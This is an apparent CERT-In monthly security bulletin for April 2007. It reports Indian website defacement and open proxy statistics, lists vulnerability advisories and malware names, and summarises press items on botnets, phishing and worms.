Cyber Intrusion during April 2007
In total 306 Indian websites were defaced during April 2007. Mostly the websites under .com domain were defaced by the hacker groups. A chart depicting Top Level Domain(TLD) wise defacements is shown in the figure.
The vulnerabilities which might have been exploited for the defacements are:
- PHP Imap_Mail_Compose (), GD graphics library and PHP- Fusion SQL injection vulnerabilities CIAD-2007-19
- Multiple Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution and Cross-Site Scripting Attacks CIVN-2007-44
Statistics of Defaced Indian Websites in April 2007
Any proxy server that doesn't restrict its client base to its own set of clients and allows any other client to connect to it, is known as an open proxy server. An open proxy server will accept client connections from any IP address and make connections to any Internet resource.
CERT-In tracked 60 open proxy servers functioning in India during April 2007. All the concerned ISPs were alerted immediately to shut down the open proxy servers. A bar chart of open proxy servers tracked during this year is shown in the figure.
Statistics of Open Proxy Servers tracked during July 2006 - April 2007
The critical and medium vulnerabilities in various Operating Systems, Application software and Network devices discovered during April 2007 and their countermeasures alongwith wide-spreading malicious code like virus/ worm/Trojan are given below:
Multiple Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution and Cross-Site Scripting Attacks
Microsoft Windows Agent URL Parsing Remote Code Execution Vulnerability
Multiple Vulnerabilities in Client/server run-time subsystem (CSRSS)
041317-4330-99
Win32.Banker.cmb [ Kaspersky], Spy/BanSpy [Fortinet],
Trj/Wsnpoem.L [Panda]
-042306-2226-99&tabid=2
-042705-0108-99
Zombies infiltrate US military networks
[Source:
www.theregister.co.uk]
Security researchers have traced spam-sending botnet clients back to networks run by the US military.Support Intelligence, the firm whose research on honeynets revealed that the networks of at least 28 Fortune 1000 companies contained malware-infected spam-spewing PCs, has found evidence of bots running behind military networks.
Phishing attack evades bank's two-factor authentication
[Source:
www.theregister.co.uk]
A two-factor authentication system operated by Dutch bank ABN Amro has been compromised and money stolen from the online accounts of customers who fell for a phishing scam.
Two-factor authentication for online banking usually involves passwords and tokens which provide synchronised, constantly changing numbers to use as additional evidence of identity.
Phishers spread their nets
[Source: www.theregister.co.uk]
The percentage of US-hosted phishing attacks dropped from 74 per cent in February to 55 per cent in March, according to the latest online fraud report of security firm RSA.Last month also witnessed a "dramatic increase" in the number of brands targeted by email scams, from 153 in February to 202 in March, even as the number of phishing attacks dropped slightly.
McAfee: .gov sites are safest
[Source:
www.zdnetasia.com]
The safest Web sites on the Internet end in .gov, according to security firm McAfee. McAfee found no risky Web sites within the domain for U.S. government agencies, it said in a report published Monday. In contrast, one in 10 Web sites that end in .tk, the domain for the tiny island of Tokelau , either spread malicious software or warrant a warning because of pop-ups or other nuisances, McAfee said.
Scumbag malware authors exploit Virginia Tech tragedy
[Source:www.theregister.com]
Pond-dwelling virus writers have crafted a malware attack that poses as camera phone footage of the shootings at Virginia Tech University that claimed 32 lives on Monday. Spam email messages carry a photograph of gunman Cho Seung-hui and claim to link to a Brazilian movie website carrying footage of the campus shootings.Surfers who click on the link will find only a malicious screensaver file (TERROR_EM_VIRGINIA.SCR) that attempts to install a banking spyware Trojan horse on the Windows PCs of prospective marks, anti-virus firm Sophos reports. The Packer Trojan horse attempts to steal online banking credentials. This login information offers cybercrooks the chance to subsequently clean out online banking accounts.
Worm exploits Windows DNS hole
[Source:
www.news.com.com]
McAfee on Monday afternoon said it had spotted a variant of Nirbot that appears to exploit the recently disclosed vulnerability in the Windows DNS service . Nirbot is a typical botworm that gives an attacker full control over an infected computer via an Internet Relay Chat channel, McAfee said. "An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDoS (distributed denial-of-service) attack on Internet systems," according to McAfee's description of the pest . There are multiple versions of the Nirbot family , which is also known as Rinbot.
New IM worm targets Skype users
[Source:news.com.com]
A new instant-messaging pest that spreads using the chat feature in Skype has surfaced, security firm F-Secure warned Monday. The worm, dubbed Pykse.A, is similar to threats that affect instant-messaging applications. A targeted Skype user will receive a chat message with text and a Web link that looks like it goes to a JPEG file on a Web site, F-Secure said on its Web site .
Clicking the link will redirect the user to a malicious file. The file, after executing, will send a malicious link to all online contacts in a Skype user's list and will show a picture of a scantily clad woman, F-Secure said. In addition, it sets the user's Skype status message to "Do Not Disturb," the security firm said.
Poor e-mail practices pose security risk
[Source:www.zdnetasia.com]
SINGAPORE --Cybercriminals are still using e-mail as a means to launch malware attacks on enterprises, according to a senior executive at Cisco Systems.
"E-mail is still the vehicle by which they can infect corporations," said John Stewart, Cisco's chief security officer, in a teleconference Tuesday with journalists and analysts. Referring to a Cisco study conducted last year, Stewart said that regardless of country, over 10 percent of respondents will still "double click on all e-mail [messages], no matter where they come from". Attackers, he said, exploit this vulnerability to spread malware, and "one out of 10 [people] get infected [by malware] because of bad behavior".
Entrepreneurial hackers buy sponsored links on Google
[Source:www.computerworld.com]
Ad links sidetracked users, installed password stealer
A hacker scheme that involved buying search keywords on Google and then routing users to a malicious site when they clicked on sponsored links was revealed yesterday by a security company.According to Roger Thompson , chief technology officer at Exploit Prevention Labs , the ploy involved sponsored links (the text ads that appear alongside search results on Google), a malicious intermediary and malware that steals online banking usernames and passwords.
"It's quite an investment on the bad guys' part," said Thompson . "Instead of just hacking into sites, they bought keywords."
Report: Targeted e-mail attacks increasing
[Source:www.computerworld.com]
Stealthy, targeted cyberattacks via e-mail continue to rise, e-mail security specialist MessageLabs said Wednesday.
During March, MessageLabs intercepted 716 e-mail messages that were part of 249 targeted attacks aimed at 216 of its customers, the Gloucester , England-based provider of hosted e-mail filtering services said in a research report. Of the attacks, almost 200 consisted of a single malicious e-mail designed to infiltrate an organization, MessageLabs said.
Web attackers get better at hiding
[Source:www.zdnetasia.com]
VANCOUVER , B.C.--Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert said Wednesday.
Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.
Major brands see rise in online fraud
[Source: www.news.com.com]
Corporate brands face multipronged assaults from fraudulent online attackers, according to a report published Monday that quantifies the scope of the most common threats.
MarkMonitor , which supplies Internet brand protection services to companies, said its new "Brandjacking Index" found cybersquatting--in which illicit sites usurp popular trademarks--false association, phishing and click fraud as major threats. A four-week survey of public Web sites completed early in April found cybersquatting posed the greatest threat to brands. Phishing--the criminal use of e-mail to trick consumers into divulging passwords, credit cards and other personal details--and domain "kiting" --the rapid registering and dropping of similar-sounding Web site names--are on the rise.
US still top of the spam pops
[Source: www.viruslist.com]
The US has been named the top spam-relaying country in the world in a recent new report. In the first quarter of 2007 almost a fifth of all spam originated in the United States, while China and, surprisingly, Poland were also in the top 3 of the junk mail ratings.
Exactly half the top dozen were European countries, with Italy , France , Germany , Spain and Russia joining Poland in the rankings. South Korea , India and Taiwan represented Asia , leaving the remaining spot to Brazil . This ratio is consistent with continental-wide figures for spam relaying: Europe accounted for 35.1% of junk email in the first quarter of 2007, closely followed by Asia (33.4%) and then North America (22.9%). Australasia comes in at the tail end of the list with 0.6% of the world's spam volume.
Sophos reveals rise of web-based malware in Q1 2007
[Source: www.sophos.com]
Sophos, a world leader in IT security and control, has announced the results of its research into worldwide cybercrime activity during the first three months of 2007. The findings reveal that the overall number of new pieces of malware has grown dramatically, with the majority of malicious code writers selecting the web as its playground of choice. In the first quarter of 2007, Sophos identified 23,864 new threats - more than double the number found in the same period last year when the company identified 9,450. At the same time, the percentage of infected email has dropped from 1.3 percent, or one in 77 emails in the first three months of 2006, to one in 256, or just 0.4 percent in 2007.
Data theft replaces malware as top security concern
[Source:www.theregister.com]
Theft of information and regulatory compliance are beginning to replace malware infestation and hacking as the top security concerns, according to a poll of enterprise IT security chiefs.
The second annual Cisco-sponsored poll of 100 infosec pros in large UK enterprises found that 38 per cent of respondents place theft of information as their number one concern, while 33 per cent fret about regulatory compliance. Viruses, the prime concern of 55 per cent of respondents in 2006, were cited by just 27 per cent as their top fear this year.